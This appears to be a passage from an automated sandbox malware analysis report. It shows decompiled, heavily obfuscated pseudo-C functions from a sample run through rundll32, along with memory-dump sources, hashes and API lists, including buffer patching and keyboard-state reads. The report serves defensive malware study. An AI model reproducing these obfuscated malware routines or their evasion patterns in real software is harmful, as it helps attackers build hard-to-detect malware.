				_t211 = 0x2a;
				_v36 = _v36 / _t211;
				_t212 = 0x45;
				_v36 = _v36 / _t212;
				_v36 = _v36 ^ 0x000da6e6;
				_v28 = 0x24761f;
				_v28 = _v28 << 9;
				_v28 = _v28 + 0xffffc268;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0040fbfa;
				_v60 = 0xc6a3a8;
				_v60 = _v60 + 0xffff6723;
				_v60 = _v60 * 0x24;
				_v60 = _v60 ^ 0x1bd7278b;
				_v44 = 0xb19a36;
				_v44 = _v44 + 0xb2d2;
				_v44 = _v44 | 0xf7fdfee7;
				_v44 = _v44 ^ 0xf7fbe5a1;
				_v76 = 0x3b8058;
				_v76 = _v76 | 0x902cc23a;
				_v76 = _v76 ^ 0x903f9f8c;
				_t226 =  *0x2d520c; // 0x0
				_t202 = E002C4FA8(_v84, _t226 + 0x220, _v16, _v40);
				_t234 = _a4 + 0x2c;
				_t203 = E002CFC96(_v72, _v32, _a4 + 0x2c, _v48, _t202);
				_t243 = _t203;
				if(_t203 != 0) {
					_push(_v64);
					_push(_v24);
					_push(0x2b10cc);
					E002BE7CE(E002BAB66(_v8, _v80, _t243), _t243, _v52,  *((intOrPtr*)(_a8 + 0x14)), _v8, _v20, _v68, _v56, _v12, _t234);
					E002BAE03(_v36, _v28, _v60, _t206);
					E002BBAB0( &_v616, _v44, _v76);
				}
				return 1;
			}

































                                                                                                                      0x002cd3d1
                                                                                                                      0x002cd3d7
                                                                                                                      0x002cd3de
                                                                                                                      0x002cd3e5
                                                                                                                      0x002cd3ec
                                                                                                                      0x002cd3f3
                                                                                                                      0x002cd3fa
                                                                                                                      0x002cd401
                                                                                                                      0x002cd40f
                                                                                                                      0x002cd410
                                                                                                                      0x002cd417
                                                                                                                      0x002cd41a
                                                                                                                      0x002cd421
                                                                                                                      0x002cd428
                                                                                                                      0x002cd42f
                                                                                                                      0x002cd436
                                                                                                                      0x002cd43d
                                                                                                                      0x002cd444
                                                                                                                      0x002cd44b
                                                                                                                      0x002cd44f
                                                                                                                      0x002cd456
                                                                                                                      0x002cd45d
                                                                                                                      0x002cd464
                                                                                                                      0x002cd46c
                                                                                                                      0x002cd46f
                                                                                                                      0x002cd476
                                                                                                                      0x002cd47d
                                                                                                                      0x002cd485
                                                                                                                      0x002cd488
                                                                                                                      0x002cd48f
                                                                                                                      0x002cd496
                                                                                                                      0x002cd49a
                                                                                                                      0x002cd49e
                                                                                                                      0x002cd4a5
                                                                                                                      0x002cd4ac
                                                                                                                      0x002cd4b3
                                                                                                                      0x002cd4b6
                                                                                                                      0x002cd4bd
                                                                                                                      0x002cd4c4
                                                                                                                      0x002cd4cf
                                                                                                                      0x002cd4d6
                                                                                                                      0x002cd4d9
                                                                                                                      0x002cd4e0
                                                                                                                      0x002cd4e7
                                                                                                                      0x002cd4ee
                                                                                                                      0x002cd4f5
                                                                                                                      0x002cd4fc
                                                                                                                      0x002cd500
                                                                                                                      0x002cd507
                                                                                                                      0x002cd50e
                                                                                                                      0x002cd515
                                                                                                                      0x002cd51c
                                                                                                                      0x002cd523
                                                                                                                      0x002cd52a
                                                                                                                      0x002cd531
                                                                                                                      0x002cd538
                                                                                                                      0x002cd53f
                                                                                                                      0x002cd546
                                                                                                                      0x002cd54d
                                                                                                                      0x002cd554
                                                                                                                      0x002cd55b
                                                                                                                      0x002cd562
                                                                                                                      0x002cd569
                                                                                                                      0x002cd570
                                                                                                                      0x002cd577
                                                                                                                      0x002cd57b
                                                                                                                      0x002cd582
                                                                                                                      0x002cd58f
                                                                                                                      0x002cd597
                                                                                                                      0x002cd59c
                                                                                                                      0x002cd5a4
                                                                                                                      0x002cd5a7
                                                                                                                      0x002cd5aa
                                                                                                                      0x002cd5b1
                                                                                                                      0x002cd5b8
                                                                                                                      0x002cd5bc
                                                                                                                      0x002cd5c3
                                                                                                                      0x002cd5c7
                                                                                                                      0x002cd5ce
                                                                                                                      0x002cd5d5
                                                                                                                      0x002cd5e0
                                                                                                                      0x002cd5e3
                                                                                                                      0x002cd5ea
                                                                                                                      0x002cd5f1
                                                                                                                      0x002cd5f8
                                                                                                                      0x002cd5ff
                                                                                                                      0x002cd606
                                                                                                                      0x002cd60d
                                                                                                                      0x002cd614
                                                                                                                      0x002cd621
                                                                                                                      0x002cd630
                                                                                                                      0x002cd63f
                                                                                                                      0x002cd646
                                                                                                                      0x002cd64e
                                                                                                                      0x002cd650
                                                                                                                      0x002cd653
                                                                                                                      0x002cd656
                                                                                                                      0x002cd65f
                                                                                                                      0x002cd68d
                                                                                                                      0x002cd69c
                                                                                                                      0x002cd6ad
                                                                                                                      0x002cd6b5
                                                                                                                      0x002cd6bd

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: >T$X$1@$k>$txb$z_i0
                                                                                                                      • API String ID: 1586166983-1035483976
                                                                                                                      • Opcode ID: 72b8b4868ff15dfebf17e7b49a73a5c0275ce71b4565eb3a3bb5fbc625ac99b1
                                                                                                                      • Instruction ID: 11d818ef680a54ebea1f5d3b40daf620718a88f824da36f45500a8e0049c61c3
                                                                                                                      • Opcode Fuzzy Hash: 72b8b4868ff15dfebf17e7b49a73a5c0275ce71b4565eb3a3bb5fbc625ac99b1
                                                                                                                      • Instruction Fuzzy Hash: 8C910FB2C00219ABCF18CFE5D98A8DEFBB1FF48304F208159E416B6260D7B45A55CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C542E Relevance: 6.4, Strings: 5, Instructions: 107COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C542E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t103;
				void* _t104;
				void* _t107;
				signed int _t109;
				signed int _t110;
				void* _t119;
				void* _t120;
				signed int* _t122;

				_t122 =  &_v40;
				_v16 = 0x36dfa5;
				_v16 = _v16 + 0x3b08;
				_t107 = __ecx;
				_t119 = 0;
				_t109 = 0x6b;
				_v16 = _v16 / _t109;
				_v16 = _v16 ^ 0x0008b2f0;
				_t120 = 0x25318c3;
				_v32 = 0xe406cb;
				_v32 = _v32 + 0xf1ff;
				_v32 = _v32 << 0xd;
				_t110 = 0x38;
				_v32 = _v32 / _t110;
				_v32 = _v32 ^ 0x02d3dd20;
				_v36 = 0x75fef9;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 + 0x1d86;
				_v36 = _v36 | 0xca94675a;
				_v36 = _v36 ^ 0xca99002d;
				_v20 = 0xf78cd;
				_v20 = _v20 * 0x50;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x004e8f0d;
				_v24 = 0x451f1c;
				_v24 = _v24 + 0xffffecca;
				_v24 = _v24 + 0xffffe02c;
				_v24 = _v24 ^ 0x0044bfd9;
				_v40 = 0xfdbfec;
				_v40 = _v40 << 8;
				_v40 = _v40 + 0x2a17;
				_v40 = _v40 ^ 0x2ee485ab;
				_v40 = _v40 ^ 0xd32b8602;
				_v28 = 0xc36f29;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 + 0xffff93a5;
				_v28 = _v28 ^ 0xfffd5496;
				_v4 = 0xb22cca;
				_v4 = _v4 * 0x61;
				_v4 = _v4 ^ 0x438b1823;
				_v8 = 0x4d4bc7;
				_v8 = _v8 + 0xffff7d22;
				_v8 = _v8 ^ 0x00436970;
				_v12 = 0xfbac3c;
				_v12 = _v12 | 0x3e605f41;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xefb5eaa0;
				do {
					while(_t120 != 0x25318c3) {
						if(_t120 == 0x409e50d) {
							_t103 = E002C274F();
							_t122 = _t122 - 0xc + 0xc;
							_t120 = 0x7f367f8;
							_t119 = _t119 + _t103;
							continue;
						} else {
							if(_t120 == 0x7f367f8) {
								_t104 = E002BB782(_t107 + 0xc, _v24, _v40, _v28);
								_t122 =  &(_t122[2]);
								_t120 = 0xdeee07a;
								_t119 = _t119 + _t104;
								continue;
							} else {
								if(_t120 != 0xdeee07a) {
									goto L10;
								} else {
									_t119 = _t119 + E002BB782(_t107 + 4, _v4, _v8, _v12);
								}
							}
						}
						L6:
						return _t119;
					}
					_t120 = 0x409e50d;
					L10:
				} while (_t120 != 0xb6d7b22);
				goto L6;
			}





















                                                                                                                      0x002c542e
                                                                                                                      0x002c5431
                                                                                                                      0x002c543b
                                                                                                                      0x002c544d
                                                                                                                      0x002c544f
                                                                                                                      0x002c5451
                                                                                                                      0x002c5456
                                                                                                                      0x002c545c
                                                                                                                      0x002c5464
                                                                                                                      0x002c5469
                                                                                                                      0x002c5476
                                                                                                                      0x002c547e
                                                                                                                      0x002c5487
                                                                                                                      0x002c548a
                                                                                                                      0x002c548e
                                                                                                                      0x002c5496
                                                                                                                      0x002c549e
                                                                                                                      0x002c54a3
                                                                                                                      0x002c54ab
                                                                                                                      0x002c54b3
                                                                                                                      0x002c54bb
                                                                                                                      0x002c54c8
                                                                                                                      0x002c54cc
                                                                                                                      0x002c54d1
                                                                                                                      0x002c54d9
                                                                                                                      0x002c54e1
                                                                                                                      0x002c54e9
                                                                                                                      0x002c54f1
                                                                                                                      0x002c54f9
                                                                                                                      0x002c5501
                                                                                                                      0x002c5506
                                                                                                                      0x002c550e
                                                                                                                      0x002c5516
                                                                                                                      0x002c551e
                                                                                                                      0x002c5526
                                                                                                                      0x002c552b
                                                                                                                      0x002c5533
                                                                                                                      0x002c553b
                                                                                                                      0x002c5548
                                                                                                                      0x002c554c
                                                                                                                      0x002c5554
                                                                                                                      0x002c555c
                                                                                                                      0x002c5564
                                                                                                                      0x002c556c
                                                                                                                      0x002c5574
                                                                                                                      0x002c557c
                                                                                                                      0x002c5581
                                                                                                                      0x002c5589
                                                                                                                      0x002c5589
                                                                                                                      0x002c5593
                                                                                                                      0x002c55fb
                                                                                                                      0x002c5600
                                                                                                                      0x002c5603
                                                                                                                      0x002c5608
                                                                                                                      0x00000000
                                                                                                                      0x002c5595
                                                                                                                      0x002c559b
                                                                                                                      0x002c55d7
                                                                                                                      0x002c55dc
                                                                                                                      0x002c55df
                                                                                                                      0x002c55e4
                                                                                                                      0x00000000
                                                                                                                      0x002c559d
                                                                                                                      0x002c55a3
                                                                                                                      0x00000000
                                                                                                                      0x002c55a5
                                                                                                                      0x002c55bc
                                                                                                                      0x002c55bc
                                                                                                                      0x002c55a3
                                                                                                                      0x002c559b
                                                                                                                      0x002c55be
                                                                                                                      0x002c55c7
                                                                                                                      0x002c55c7
                                                                                                                      0x002c560f
                                                                                                                      0x002c5611
                                                                                                                      0x002c5611
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: 74ac0fb4f1715f6c5f29c9132280eacd224c550cd477c88ce57b1df09f00d384
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: B4418AB29093029FC344CF25D98990FFBE1BBD4748F409A2DF49996210D7B4DA1A8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B1F9B Relevance: 5.4, Strings: 4, Instructions: 413COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002B1F9B(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _t419;
				void* _t424;
				void* _t432;
				signed int _t435;
				void* _t444;
				intOrPtr* _t446;
				void* _t448;
				signed char* _t458;
				signed char* _t493;
				intOrPtr* _t498;
				intOrPtr _t499;
				intOrPtr _t500;
				void* _t501;
				signed char* _t502;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				intOrPtr _t513;
				void* _t514;
				void* _t515;
				void* _t519;

				_t498 = _a20;
				_t446 = __edx;
				_push(_t498);
				_push(_a16);
				_push(_a12);
				_v88 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(__ecx);
				_v236 = 0xf0db43;
				_t515 = _t514 + 0x1c;
				_v236 = _v236 + 0xffff6527;
				_v236 = _v236 ^ 0x37601acd;
				_t499 = 0;
				_v236 = _v236 >> 1;
				_t448 = 0xb503f3;
				_v236 = _v236 ^ 0x1bc82d53;
				_v140 = 0x2172ad;
				_v140 = _v140 + 0x5f16;
				_v140 = _v140 ^ 0x0021d183;
				_v124 = 0x27fcb3;
				_t504 = 0x21;
				_v124 = _v124 / _t504;
				_v124 = _v124 ^ 0x00013673;
				_v108 = 0x51f448;
				_t505 = 0x49;
				_v92 = 0;
				_v108 = _v108 * 0x2f;
				_v108 = _v108 ^ 0x0f088890;
				_v212 = 0xcc9eac;
				_v212 = _v212 + 0xffffe9a6;
				_v212 = _v212 / _t505;
				_v212 = _v212 + 0xffffa822;
				_v212 = _v212 ^ 0x000711be;
				_v220 = 0xbaa1b0;
				_t506 = 0x3a;
				_v220 = _v220 * 0x1b;
				_v220 = _v220 * 0x49;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x5bc66ad4;
				_v96 = 0x96051c;
				_v96 = _v96 * 0x64;
				_v96 = _v96 ^ 0x3a9f1857;
				_v144 = 0x7390a9;
				_v144 = _v144 + 0xe6fa;
				_v144 = _v144 ^ 0x007f1cdd;
				_v196 = 0xf57225;
				_v196 = _v196 >> 0xe;
				_v196 = _v196 + 0xffff98f0;
				_v196 = _v196 ^ 0x2c45e12b;
				_v196 = _v196 ^ 0xd3b3c009;
				_v204 = 0xadefc1;
				_v204 = _v204 >> 4;
				_v204 = _v204 | 0xb7bea7b8;
				_v204 = _v204 / _t506;
				_v204 = _v204 ^ 0x03274dc6;
				_v224 = 0x9d9cb1;
				_v224 = _v224 + 0xffffa27a;
				_v224 = _v224 + 0xffffee01;
				_v224 = _v224 + 0xffff764e;
				_v224 = _v224 ^ 0x0095b081;
				_v192 = 0x5eb987;
				_v192 = _v192 + 0xffff1159;
				_t507 = 0xe;
				_v192 = _v192 * 0x23;
				_v192 = _v192 + 0xffff653a;
				_v192 = _v192 ^ 0x0cdf46f4;
				_v104 = 0x141020;
				_v104 = _v104 << 6;
				_v104 = _v104 ^ 0x0502b476;
				_v168 = 0xc57d6d;
				_v168 = _v168 / _t507;
				_v168 = _v168 | 0x88578591;
				_v168 = _v168 ^ 0x8850307a;
				_v120 = 0x64bf72;
				_v120 = _v120 << 0xf;
				_v120 = _v120 ^ 0x5fbc8f9f;
				_v128 = 0xd63e1a;
				_v128 = _v128 + 0xffff0b7c;
				_v128 = _v128 ^ 0x00df6f35;
				_v136 = 0xd9491f;
				_v136 = _v136 + 0xffff8a09;
				_v136 = _v136 ^ 0x00d088a2;
				_v112 = 0xceb298;
				_v112 = _v112 + 0x36cc;
				_v112 = _v112 ^ 0x00c43f46;
				_v132 = 0x9f966b;
				_v132 = _v132 + 0xd61c;
				_v132 = _v132 ^ 0x00a3d2ff;
				_v216 = 0x70daad;
				_v216 = _v216 ^ 0xde964b68;
				_t508 = 0x3f;
				_v216 = _v216 * 0x49;
				_v216 = _v216 | 0xd3ab0205;
				_v216 = _v216 ^ 0xdfb04ca5;
				_v200 = 0xe4f811;
				_v200 = _v200 + 0xffffdd8f;
				_v200 = _v200 | 0x8a8b7b9c;
				_v200 = _v200 + 0xb2a2;
				_v200 = _v200 ^ 0x8af46931;
				_v244 = 0x65145a;
				_v244 = _v244 >> 4;
				_v244 = _v244 + 0x823b;
				_v244 = _v244 / _t508;
				_v244 = _v244 ^ 0x000ba257;
				_v184 = 0x53b52d;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 | 0x3ab2fca7;
				_v184 = _v184 >> 0xa;
				_v184 = _v184 ^ 0x00013efe;
				_v176 = 0x3e1c9c;
				_v176 = _v176 * 0x3f;
				_v176 = _v176 * 0x61;
				_v176 = _v176 ^ 0xcaa54878;
				_v172 = 0xb8475b;
				_v172 = _v172 >> 2;
				_v172 = _v172 + 0xffff45a9;
				_v172 = _v172 ^ 0x002df2ce;
				_v148 = 0x11eadc;
				_v148 = _v148 * 0x2c;
				_v148 = _v148 ^ 0x0312b4e7;
				_v228 = 0xd45ea;
				_v228 = _v228 + 0x1c9a;
				_v228 = _v228 ^ 0x843ee8f1;
				_v228 = _v228 + 0xffff47b4;
				_v228 = _v228 ^ 0x843da11a;
				_v116 = 0x7a0457;
				_t509 = 0x4d;
				_v116 = _v116 / _t509;
				_v116 = _v116 ^ 0x00002c66;
				_v232 = 0x7f0d8a;
				_v232 = _v232 + 0xa3a9;
				_v232 = _v232 + 0xf9ff;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x0040e313;
				_v208 = 0x135f21;
				_v208 = _v208 | 0x41f85818;
				_t510 = 0x60;
				_v208 = _v208 * 0x65;
				_v208 = _v208 << 0xe;
				_v208 = _v208 ^ 0x245ebba3;
				_v240 = 0x80e1e4;
				_v240 = _v240 + 0x9e19;
				_v240 = _v240 * 0x1d;
				_v240 = _v240 + 0xa9b2;
				_v240 = _v240 ^ 0x0eacf51a;
				_v100 = 0x156d59;
				_v100 = _v100 + 0x8f40;
				_v100 = _v100 ^ 0x001bd2c0;
				_v152 = 0x95953b;
				_v152 = _v152 >> 7;
				_v152 = _v152 / _t510;
				_v152 = _v152 ^ 0x000ebfd6;
				_v180 = 0x897e25;
				_v180 = _v180 | 0x70565201;
				_t511 = 0x75;
				_v180 = _v180 / _t511;
				_v180 = _v180 << 0xd;
				_v180 = _v180 ^ 0xdf07d45f;
				_v160 = 0x7982fe;
				_t512 = 0x32;
				_t513 = _v88;
				_v160 = _v160 / _t512;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x4dcbb71a;
				_v188 = 0x3ea9a3;
				_v188 = _v188 >> 2;
				_v188 = _v188 * 0x4a;
				_v188 = _v188 * 0x27;
				_v188 = _v188 ^ 0xb0903fbe;
				_v164 = 0x944a5b;
				_v164 = _v164 << 9;
				_v164 = _v164 * 0x65;
				_v164 = _v164 ^ 0x02abce10;
				_v156 = 0x59a8bb;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 + 0x17fc;
				_v156 = _v156 ^ 0x000023b1;
				goto L1;
				do {
					while(1) {
						L1:
						_t519 = _t448 - 0x5a88f65;
						if(_t519 > 0) {
							break;
						}
						if(_t519 == 0) {
							_t500 =  *_t446;
							E002CFA99(_v112, _v132, _v216, _v200, _t500);
							_t501 = _t500 + _v124;
							E002CFD29(_v84, _v244, _t501, _v184, _v80);
							_t502 = _t501 + _v80;
							_push(_v148);
							_push(_v172);
							_push(_t513);
							E002B5894(_t502, _v176);
							_t493 =  &(_t502[_t513]);
							_t515 = _t515 + 0x24;
							_t458 = _t502;
							if(_t502 >= _t493) {
								L15:
								_t432 = E002BEF71(0, 0xe);
								_t448 = 0x44ef61d;
								 *((char*)(_t432 + _t502)) = 0;
								_t499 = _v92;
								continue;
							} else {
								goto L12;
							}
							do {
								L12:
								if(( *_t458 & 0x000000ff) == _v236) {
									 *_t458 = 0xc3;
								}
								_t458 =  &(_t458[1]);
							} while (_t458 < _t493);
							goto L15;
						}
						if(_t448 == 0xb503f3) {
							_t448 = 0xf32de15;
							continue;
						}
						if(_t448 == 0x231aa40) {
							_t435 = E002C45CD(_v192,  &_v76,  &_v84);
							asm("sbb ecx, ecx");
							_t448 = ( ~_t435 & 0xfac85eed) + 0xa894c28;
							continue;
						}
						if(_t448 == 0x44ef61d) {
							E002B68DE(_v232, _v208, _v240, _v100, _v84);
							_t515 = _t515 + 0xc;
							_t448 = 0xa894c28;
							continue;
						}
						if(_t448 != 0x551ab15) {
							goto L28;
						}
						_t513 = E002BEF71(_v164, _v156);
						_t448 = 0xb847f8c;
						 *((intOrPtr*)(_t446 + 4)) = _v140 + _v80 + _t513;
					}
					if(_t448 == 0xa894c28) {
						E002B68DE(_v152, _v180, _v160, _v188, _v76);
						_t515 = _t515 + 0xc;
						_t448 = 0x47d0478;
						goto L28;
					}
					if(_t448 == 0xb847f8c) {
						_push(_t448);
						_push(_t448);
						_t419 = E002C3512( *((intOrPtr*)(_t446 + 4)));
						 *_t446 = _t419;
						if(_t419 == 0) {
							_t448 = 0x44ef61d;
						} else {
							_t448 = 0x5a88f65;
							_t499 = 1;
							_v92 = 1;
						}
						goto L1;
					}
					if(_t448 == 0xe73b6d2) {
						_v48 = _v88;
						_v52 = 0x20;
						_v56 =  &_v32;
						_v64 =  *_t498;
						_v60 =  *((intOrPtr*)(_t498 + 4));
						_t424 = E002CFF31( &_v76,  &_v68, _v144, _v196, _v204);
						_t515 = _t515 + 0xc;
						if(_t424 == 0) {
							break;
						}
						_t448 = 0x231aa40;
						goto L1;
					}
					if(_t448 != 0xf32de15) {
						goto L28;
					}
					_push( *_t498);
					_t444 = E002C1831(_v212, _v220,  &_v32, _v96, _t448,  *((intOrPtr*)(_t498 + 4)));
					_t515 = _t515 + 0x18;
					if(_t444 == 0) {
						break;
					}
					_t448 = 0xe73b6d2;
					goto L1;
					L28:
				} while (_t448 != 0x47d0478);
				return _t499;
			}
















































































                                                                                                                      0x002b1fa5
                                                                                                                      0x002b1fac
                                                                                                                      0x002b1fae
                                                                                                                      0x002b1faf
                                                                                                                      0x002b1fb8
                                                                                                                      0x002b1fbf
                                                                                                                      0x002b1fc6
                                                                                                                      0x002b1fcd
                                                                                                                      0x002b1fd4
                                                                                                                      0x002b1fd5
                                                                                                                      0x002b1fd6
                                                                                                                      0x002b1fdb
                                                                                                                      0x002b1fe3
                                                                                                                      0x002b1fe6
                                                                                                                      0x002b1ff0
                                                                                                                      0x002b1ff8
                                                                                                                      0x002b1ffa
                                                                                                                      0x002b1ffe
                                                                                                                      0x002b2003
                                                                                                                      0x002b200b
                                                                                                                      0x002b2013
                                                                                                                      0x002b201b
                                                                                                                      0x002b2023
                                                                                                                      0x002b2037
                                                                                                                      0x002b203c
                                                                                                                      0x002b2045
                                                                                                                      0x002b2050
                                                                                                                      0x002b2063
                                                                                                                      0x002b2066
                                                                                                                      0x002b206d
                                                                                                                      0x002b2074
                                                                                                                      0x002b207f
                                                                                                                      0x002b2087
                                                                                                                      0x002b2097
                                                                                                                      0x002b209b
                                                                                                                      0x002b20a3
                                                                                                                      0x002b20ab
                                                                                                                      0x002b20b8
                                                                                                                      0x002b20b9
                                                                                                                      0x002b20c2
                                                                                                                      0x002b20c6
                                                                                                                      0x002b20cb
                                                                                                                      0x002b20d3
                                                                                                                      0x002b20e6
                                                                                                                      0x002b20ed
                                                                                                                      0x002b20f8
                                                                                                                      0x002b2100
                                                                                                                      0x002b2108
                                                                                                                      0x002b2110
                                                                                                                      0x002b2118
                                                                                                                      0x002b211d
                                                                                                                      0x002b2125
                                                                                                                      0x002b212d
                                                                                                                      0x002b2135
                                                                                                                      0x002b213d
                                                                                                                      0x002b2142
                                                                                                                      0x002b2150
                                                                                                                      0x002b2154
                                                                                                                      0x002b215c
                                                                                                                      0x002b2164
                                                                                                                      0x002b216c
                                                                                                                      0x002b2176
                                                                                                                      0x002b217e
                                                                                                                      0x002b2186
                                                                                                                      0x002b218e
                                                                                                                      0x002b219d
                                                                                                                      0x002b21a0
                                                                                                                      0x002b21a4
                                                                                                                      0x002b21ac
                                                                                                                      0x002b21b4
                                                                                                                      0x002b21bf
                                                                                                                      0x002b21c7
                                                                                                                      0x002b21d2
                                                                                                                      0x002b21e2
                                                                                                                      0x002b21e6
                                                                                                                      0x002b21ee
                                                                                                                      0x002b21f6
                                                                                                                      0x002b2201
                                                                                                                      0x002b2209
                                                                                                                      0x002b2214
                                                                                                                      0x002b221f
                                                                                                                      0x002b222a
                                                                                                                      0x002b2235
                                                                                                                      0x002b2240
                                                                                                                      0x002b224b
                                                                                                                      0x002b2256
                                                                                                                      0x002b2261
                                                                                                                      0x002b226c
                                                                                                                      0x002b2277
                                                                                                                      0x002b2282
                                                                                                                      0x002b228d
                                                                                                                      0x002b2298
                                                                                                                      0x002b22a0
                                                                                                                      0x002b22ad
                                                                                                                      0x002b22ae
                                                                                                                      0x002b22b2
                                                                                                                      0x002b22ba
                                                                                                                      0x002b22c2
                                                                                                                      0x002b22ca
                                                                                                                      0x002b22d2
                                                                                                                      0x002b22da
                                                                                                                      0x002b22e2
                                                                                                                      0x002b22ea
                                                                                                                      0x002b22f2
                                                                                                                      0x002b22f7
                                                                                                                      0x002b2305
                                                                                                                      0x002b2309
                                                                                                                      0x002b2311
                                                                                                                      0x002b2319
                                                                                                                      0x002b231e
                                                                                                                      0x002b2326
                                                                                                                      0x002b232b
                                                                                                                      0x002b2333
                                                                                                                      0x002b2340
                                                                                                                      0x002b2349
                                                                                                                      0x002b234d
                                                                                                                      0x002b2355
                                                                                                                      0x002b235d
                                                                                                                      0x002b2362
                                                                                                                      0x002b236a
                                                                                                                      0x002b2372
                                                                                                                      0x002b237f
                                                                                                                      0x002b2383
